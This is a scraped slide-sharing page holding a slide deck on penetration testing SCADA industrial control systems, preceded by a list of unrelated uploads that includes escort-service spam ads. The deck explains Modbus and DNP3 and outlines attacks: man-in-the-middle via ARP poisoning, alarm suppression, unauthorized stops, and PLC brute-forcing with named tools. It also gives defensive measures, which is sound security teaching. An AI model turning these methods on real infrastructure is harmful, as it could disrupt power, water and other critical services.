Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfMr Bounab Samir
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptxmary850239
 
Science 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxScience 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxMaryGraceBautista27
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSJoshuaGantuangco2
 
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxCulture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxPoojaSen20
 
ACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfSpandanaRallapalli
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfErwinPantujan2
 

Recently uploaded (20)

Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
 
AMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdf
AMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdfAMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdf
AMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdf
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERP
 
FILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinoFILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipino
 
Karra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptxKarra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptx
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERP
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
 
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfLike-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx
 
Science 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxScience 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptx
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
 
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxCulture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
 
ACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdf
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
 

Scada Industrial Control Systems Penetration Testing

  • 1. PENETRATION TESTING A SCADA INDUSTRIAL CONTROL SYSTEMS By : Yehia Mamdouh
  • 2. THIS PRESENTATION WILL LET US KNOW: What is SCADA? What is used For? What the benefits behind using SCADA? SCADA system concept How SCADA Communication Works? SCADA Protocols SCADA Cyber security Types of SCADA Networks Attack Vectors Penetration testing methodology Conclusion
  • 3. WHAT IS SCADA CONTROL SYSTEM? * SCADA : Supervisory Control and Data Acquisition. A type of control system can be used to monitor many different kinds of equipment in many different kinds of environments * In General Refers to an industrial control system (ICS)
  • 4. WHERE YOU CAN LOCATE SCADA? * Electric power generation, transmission, and distribution * Water and sewage * Buildings, facilities, and environments * Manufacturing * Mass transit * Traffic signals.
  • 5. BENEFITS OF SCADA Used For 1-Trasmits individual device status 2- Manages energy consumption by controlling the devices 3- Allowing directly control power system equipment 4- Control chemical plant processes, oil and gas pipelines, electrical generation and transmission equipment, manufacturing facilities...etc. EX: Motors, valves, pumps, relayes, etc. Benefits: 1- Identify and solve problems before they even start. 2- Keep your eye on long-term trends and threats 3- Identify and attack bottlenecks and inefficiencies throughout the enterprise 4- Effectively manage bigger and more complicated processes with a smaller staff.
  • 6. SCADA SYSTEM CONCEPT SCADA WorkStation : Human operator it’s a device to issue a command central SCADA console, receiving raw data in human form, also monitor and control HMI: (Human-Machine Interface) It’s Software & Hardware that allows human operator to monitor state of process under control, modify control settings, manually override auto-control operations The interface locate between the human operator and the commands relevant to the SCADA system. (Windows, Linux or Unix)
  • 7. SCADA SYSTEM CONCEPT Data Historian: Collect and store information from your mission critical systems, extract and perform accurate analyses (SQL) SCADA Server MTU: (Master terminal unit) is a device that issues the commands to the Remote Terminal Unit (RTUs) which are located at remote places from the control, gathers the required data, stores the information, and process the information and display the information RTU: Connecting to sensors on the process, converting sensors signals and sending digital data to the supervisory systems PLC: Programmable Logic Controller (PLC) automatically performers the main site control process which controls the operation of industrial equipment's. such as control of machinery
  • 8. WHO SCADA COMMUNICATIONS WORKS? * The Control Operator or workstation monitor the data and initiates control commands to HMI * HMI which is machines, traditional applications installed on workstations running Windows or Linux and recently use web applications These HMIs speak to the SCADA controlling server *SCADA controlling server collected data from Data historian which is basically a database that the SCADA server pushes data to and in some cases pulls data from * SCADA server sends the appropriate signal to the correct RTU or PLC. * The RTU or PLC consults its pre-programmed logic to determine what it should do with this control signal controls the operation of industrial equipment's *Equipment's EX: Relays, Capacitor banks, Feeder Switches, Actuators
  • 9. Temperature Level Pressure Level Oil Level Alarm Radioactivity level HMI (Web Interface) Work Station Data Historian SCADA Server Communication Router Wide Area Network RTU/PLC RTU/PLC ModBus TCP/IP– DNP3 protocols communicate between SCADA server and RTU/PLC System Concept of SCADA
  • 10. SCADA PROTOCOL * We have mention that SCADA server send signals to RTU or PLC and vice versa How Can Central SCADA console to receive information from sensors, which are very simple devices? Here is comes SCADA Protocols ! * RTU collects data from sensors and converts the readings into a protocol, such as MODBUS or DNP3, that can be transported across your communications network and back to you DNP3(Distributed Network Protocol) used for communications between master station and RTUs Port 20000 TCP/UDP Modbus is typically used for Supervisory Control and Data Acquisition (SCADA)-style network communication between devices implementations over serial, TCP/IP Standard port 502 TCP DNP3 ModBus
  • 11.
  • 12. WHY SECURITY IS IMPORTANT IN CONTROL SYSTEMS? Why? *The ability of cyber intruders to gain access to networked control systems might be easy *More efficient methods of communication = more new risks cause disaster *Control systems share the common vulnerabilities with the traditional information technology *Control systems Recently adopting web technology , Which is interesting target for cyber attacks *Non secure protocols that transmitted data some of them = TCP/IP *Control systems turn on to use Windows , Linux which have known vulnerabilities
  • 13. WHY SECURITY IS IMPORTANT IN CONTROL SYSTEMS? * New protocols and communication standards that are providing increased are the same technologies that have been exploited and compromised in the Internet and networking domains Modbus TCP Modbus request packet No authentication no encryption no security Attacks on Field Devices Database Attacks Communications hijacking and ‘Man-in-the-middle’ attacks Vulnerabilities in Common Protocols
  • 14. REAL ATTACKS For last years, security risks have been reported in control systems
  • 15. Types of SCADA Networks
  • 16. TYPES OF SCADA NETWORKS Early or Monolithic SCADA systems *First SCADA systems held all operations in one *Usually a mainframe, computer. There was little control exercised, and most early SCADA functions were limited to monitoring sensors and flagging any operations *Limited to a single plant or facility. Like the software, SCADA hardware from one vendor was rarely usable in another vendor's SCADA system.
  • 17. TYPES OF SCADA NETWORKS Distributed SCADA Systems *Shared control functions across multiple smaller (usually PC) computers connected by Local Area Networks (LAN) *Shared Real Time information and often performed small control tasks in addition to alerting operators of possible problems
  • 18. TYPES OF SCADA NETWORKS Networked SCADA systems * Current SCADA systems are usually networked * Communicate through Wide Area Networks (WAN) systems, over phone or data lines and often transmit data between nodes through Ethernet or Fiber Optic connections. * Make heavy use of Programmable Logic Controllers (PLC) to monitor and make routine process adjustments, *The hardware tends to be more interchangeable as PLC and other sub-unit vendors have standardized communications and other protocols to allow the user to choose the best component for their needs
  • 19. TYPES OF SCADA NETWORKS Internet of Things (IoT) *A data model allows to define the types of data that will be monitored, allows for new types to be added quickly and easily as new smart objects are added to the process *Allows combinations of smart things/objects, sensor network technologies * Communication will bring physical business benefits like high-resolution management of resources and products, better collaboration between enterprises, and improved life-cycle management
  • 20.
  • 21. ATTACK VECTORS *SCADA systems are vulnerable to the same threats as any TCP/IP-based system. *SCADA Administrators and Industrial Systems Analysts deceived into thinking that since their industrial networks are on separate systems ,they are safe form outside attacks. *PLCs and RTUs are usually polled by other 3rd party vendor-specific networks and protocols MODBUS4, and DNP, and are usually done over phone lines, leased private frame relay circuits, satellite systems *Security in an industrial network can be compromised in many places along the system and is most easily compromised at the SCADA host or control room level SCADA Attacks How Far?
  • 22. ATTACK VECTORS *Denial of Service (DoS) attack to crash the SCADA server leading to shut down condition *Delete system files on the SCADA server (System Downtime and Loss of Operations) *Plant a Trojan and take complete control of system *Log any company-sensitive operational data for personal or competition usage There is Attack Vectors Should be addressed 1- Backdoors and holes in network perimeter 2- Vulnerabilities in common protocols 3- Attacks on Field Devices 4- Database Attacks 5- Communications hijacking and ‘Man-in-the-middle’ attacks ++ Once the corporate network compromised, then any IP-based device or computer system can be accessed. ++ 24/7 provides an opportunity to attack the SCADA host system can cause :
  • 23. ATTACK VECTORS 1-Modern networks in the control system arena, often have inherent capabilities that are deployed without sufficient security analysis and can provide access to attackers once they are discovered. 2- Network components, have technologies These technologies often include firewalls, public-facing services, and wireless access. each of these components often does have associated security vulnerabilities 3-Remotely located control system elements that can be accessed via remotely connected communications if systems are based on commercial operating systems, the attacks can be via DDOS, escalated privilege exploits, Trojan horse Backdoors and holes in network perimeter
  • 24. ATTACK VECTORS 4- Organizations in many CI/KR sectors provide data to customers, providers, through publicly accessible services. Such as calculating load expectations, billing futures information. As these services are in the public domain, they are often accessible from the Internet with little or no user access limitations 5- Relationship between the firewall and the web server if not deployed right this allows unauthorized, data to flow from the external side to the internal domain. If the attacker compromised the trusted web server, the attacker has a channel to access internal services (or control systems) LAN. Backdoors and holes in network perimeter
  • 25. ATTACK VECTORS 1- Microsoft XP, a platform commonly used in control systems, mitigates the security issues 2- Control systems and modern networking technologies comes some inherited security vulnerabilities. Even though many of these vulnerabilities have solutions and available workarounds, the deployment of these mitigations in control systems architectures is not always feasible. Attacks Using Common Protocols
  • 26. ATTACK VECTORS 1-Control systems architectures usually have a capability for remote access to terminal end points and devices in number of ways including by telephonic or dedicated means. To provide for the collection of operational and maintenance data 2-Modern equipment has embedded file servers and web servers to facilitate robust communications these devices are part of an internal and trusted domain, and thus access into these devices can provide an attacker with an unauthorized vector into the control system architecture. 3-RTUs, are an extension of the control domain, attackers can add these field devices to their list of viable targets to be investigated during reconnaissance and scanning phases of the attack. 3-If a device is compromised, and the attacker can leverage control over the device and escalate privileges Attack into control system via field devices
  • 27. ATTACK VECTORS 1-Database applications have become core application components of control systems and their associated record keeping utilities 2-Databases used by control systems are often connected to databases located on the business network and most use (SQL). The information contained in databases makes them high-value targets for any attacker 3-Attackers can exploit the communications channel between the two networks and bypass the security mechanisms used to protect the control system environment 4-The effect of corrupted database content can impact data acquisition servers, historians, and even the operator HMI console. Control systems databases because they are so reliant on data accuracy and integrity. Database and SQL data injection attacks
  • 28. ATTACK VECTORS 1- The ability for an attacker to re-route data that is in transit on a network, the ability to capture and analyze critical traffic that is in plaintext format, and the ability toreverse engineer any unique protocols to gain command over control communications 2- By combining all of these MITM, attack is executed 3- As the attack is on the control domain, this plaintext traffic can be harvested (sniffed) and taken offline for analysis and review 4-Using ARP poisoning and collecting traffic, the attacker can establish and maintain complete control over the communications in the network , preventing the HMI from issuing alarms 5- MTM can be between HMI and RTU due to week protocol that are used like Modbus Man-in-the-middle attacks
  • 30. PENETRATION TESTING METHODOLOGY Penetration Testing Methodology we use in Control systems it like Normal Network Penetration Testing  How? * We are dealing With Devices - Operating systems (windows , Linux ) – Protocols over TCP –Application and SQL Databases – Firewalls Audit identification Devices and networks: Router configs, router tables, switch tables, physical cable checks, packet sniffing Services Local Port verification (nestate) Vulnerabilities Local banner grabbing Perimeter Identify all external connections *Review firewall rules *Review remote access methods *Check for wireless networks *Check physical access
  • 31. PENETRATION TESTING METHODOLOGY Penetration Testing Methodology we use in Control systems it like Normal Network Penetration Testing  How? Network Infrastructure Review router configs Review switch tables Conduct physical cable checks Conduct packet sniffing and analysis Host operating systems Review patch level Review password quality Review share and directory permissions Review remote access Applications Review ports and services Review OS credentials Revives remote access Consider code review PLCs, RTU,s ..etc. Review patch levels Review password quality Conduct packet sniffing
  • 32. PENETRATION TESTING METHODOLOGY Scanning / Discovery Some tools are Available Like plcscan - Scans Modbus device Modescan - Scans Modbus devices Nmap ( Be carful single Nmap scan can crush system) Metasploit Modules for Modbus detection *Most PLCs (Communication Modules) have no ability to filter based on source IP address So we Can Use python scripts or John the Ripper for crack Bruteforce PLC online Scan supported devices and stations change name of stations change IP, Netmask, gateway request full network info
  • 33. PENETRATION TESTING METHODOLOGY Analyze protocols How protocols live in the network? Not blocked by firewalls/switches Accessible between Lan segments Works form data link layer to application layer Easy to detect Easy to analyze So we Can Available Tools detect devices and their protocols monitor state, commands inject, modify reply packets in real times Sniffing Traffic Wireshark tcpdump python hex viewer
  • 34. PENETRATION TESTING METHODOLOGY Analyze protocols Modbus Using the web is the often the easiest way 80% of Modbus/TCP devices have web interfaces Other research shows most devices run Windows 2k DNP3 *Has source and destination addresses that can be useful in Man-in the-Middle attacks Such as 1-Turn off unsolicited reporting to stifle alarms 2- Issue unauthorized stops, restart, or other functions that could disrupt specific operations *Implementations typically do not employ encryption, authentication and authorization; DNP3 devices simply assume that all messages are valid
  • 35. PENETRATION TESTING METHODOLOGY Analyze protocols DNP3 Passive Network Reconnaissance With appropriate access captures and analyzes DNP3 messages. This provides the information about network topology, device functionality, Rogue Test Installs a “man-in-the-middle” device between the master and outstations that can read, modify and fabricate DNP3 messages and/or network traffic memory addresses and other data Other attacks on Data Link and Application Layer
  • 36. PENETRATION TESTING METHODOLOGY Data Manipulation Available Tools Web Application Test and SQL Injection *As Scada Use Web application On HMI and SQL in Database we can test them for possible Vulnerabilities Modlib - Scapy extention [python] OpenDNP3 - Library [C++] Metasploit Modules
  • 38. SCADA SECURITY Creating Demilitarized Zones (DMZs) Multiple DMZs could also be created for separate functionalities and access privileges, such as peer connections, the data historian, the Inter Control Center Communications Protocol (ICCP) server in SCADA systems Firewalls properly configured and coordinated, can protect passwords, IP addresses, files and more Proxy Servers Proxy server is an internet server that acts as a firewall, mediating traffic between a protected network and the internet The Security Policy Effective security policies and procedures are the first step to a secure control systems network. Many of the same policies Security Training Provide The staff that work in the facility Security Tanning very essential for preventing Physical and Social Engineering Attacks
  • 39. SCADA SECURITY 1- Identify all connections to SCADA networks 2- Disconnect unnecessary connections to the SCADA network 3- Removing or Disable unnecessary services 4- Implement internal and external IDS and establish 24-hour incident monitoring 5- Conduct Physical security surveys and assess all remote sites connected to the SCADA network to evaluate their security 6- Clearly define cyber security roles, responsibilities and authorities for managers, system administrators and users 7- Document network architecture and identify systems that serve critical function that require additional levels of protection